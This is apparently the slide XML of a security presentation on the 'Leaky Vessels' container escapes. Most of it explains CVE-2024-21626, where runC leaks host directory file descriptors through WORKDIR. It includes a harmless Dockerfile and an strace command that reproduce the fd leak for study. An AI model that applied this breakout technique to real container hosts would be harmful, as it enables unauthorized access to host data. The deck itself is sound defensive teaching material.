          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9906000" y="4794738"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3947375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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>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t>CVE-2024-21626 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1"/>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t> Escape Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ar-SA" sz="3200"/>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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367251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a:t>Leaky Vessels</a:t>
            </a:r>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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ontainer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>scapes: a type of vulnerability in which an attacker successfully gains unauthorized access to the host system's resources and data from within the container.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Snyk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> discovered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>four vulnerabilities with c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ontainer escapes type under the name: leaky Vessels:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>CVE-2024-21626: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>runc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>process.cwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> &amp; leaked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>fds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> container breakout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>CVE-2024-23651: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>Buildkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> Mount Cache Race</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>CVE-2024-23653: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>Buildkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> GRPC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>SecurityMode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> Privilege Check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>CVE-2024-23652: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>Buildkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> Build-time Container Teardown Arbitrary Delete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3034633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lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" err="1"/>
              <a:t>runC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA" sz="2400"/>
              <a:t>runC: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>a lightweight, portable, universal container runtime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>The core of Docker, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>Podman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>, CRI-O and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>Containerd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Control groups, namespaces, seccomp, capabilities, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>apparmor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Provide CLI for spawning and running containers on Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="24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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369050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lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" err="1"/>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t> leaked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" err="1"/>
              <a:t>fds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t> container breakout</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400"/>
            </a:br>
            <a:endParaRPr lang="en-US"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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>An order of operations vulnerability found in all versions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>runc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> &lt;=1.1.11, when WORKDIR is applied in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Privileged host directory file descriptors still opened by the time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> is called. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> to retain access to host’s directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="963001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lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" err="1"/>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t> leaked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" err="1"/>
              <a:t>fds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t> container breakout</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="4400"/>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a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3334954"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300"/>
              <a:t>Reproduce the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300"/>
              <a:t> leakage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>run a simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1"/>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>, trace execution with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1"/>
              <a:t>strace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="30000"/>
              <a:t>*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" baseline="30000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" i="1">
                <a:solidFill>
                  <a:srgbClr val="C792EA"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500"/>
              <a:t> alpine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" i="1">
                <a:solidFill>
                  <a:srgbClr val="C792EA"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>RUN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500"/>
              <a:t> /FINDME </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" i="1">
                <a:solidFill>
                  <a:srgbClr val="C792EA"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>WORKDIR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500"/>
              <a:t> /FINDME </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" i="1">
                <a:solidFill>
                  <a:srgbClr val="C792EA"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>RUN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="ADDB67"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1"/>
              <a:t>strace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500"/>
              <a:t> -p $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1"/>
              <a:t>pidof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1"/>
              <a:t>dockerd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500"/>
              <a:t>) -ff -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1"/>
              <a:t>strace.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500"/>
              <a:t> -s 128 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1"/>
              <a:t>tt</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" baseline="30000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A492C89C-7126-9603-4667-FD70519927DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977462" y="6022428"/>
            <a:ext cx="4350935" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="1200"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" err="1"/>
              <a:t>snyk.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>/blog/leaky-vessels-container-vuln-deep-dive/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SA" sz="1200"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3983199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lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" err="1"/>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t> leaked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" err="1"/>
              <a:t>fds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t> container breakout</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="44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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7E801EA-86FA-FDF2-00A4-87626409FEE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977462" y="6022428"/>
            <a:ext cx="4350935" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="1200"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" err="1"/>
              <a:t>snyk.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>/blog/leaky-vessels-container-vuln-deep-dive/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SA" sz="1200"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD16AD61-F3A0-9357-2624-9510FBB50162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="1507733"/>
            <a:ext cx="7772400" cy="3842534"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{915B8DF0-3A75-4101-E021-B85ED3F2FD87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="3894706"/>
            <a:ext cx="4727029" cy="45657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A">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AEC9B74-890A-C477-A658-9260A7FBAA3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225571" y="3428999"/>
            <a:ext cx="4711258" cy="26013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A">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B85CC0E3-9CBF-120E-0C4D-382B18050B33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7152290" y="1639731"/>
            <a:ext cx="2829910" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FD_CLOEXEC assertion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But no explicit close</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B59F1143-1F20-BC34-7A08-BA7887BEFF9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7152290" y="3894706"/>
            <a:ext cx="2829910" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interesting!</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
